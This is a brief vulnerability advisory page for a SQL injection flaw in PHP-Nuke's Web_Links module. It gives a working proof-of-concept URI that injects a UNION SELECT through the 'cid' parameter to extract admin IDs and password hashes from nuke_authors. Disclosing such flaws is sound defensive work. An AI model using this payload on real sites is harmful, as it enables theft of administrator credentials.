PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202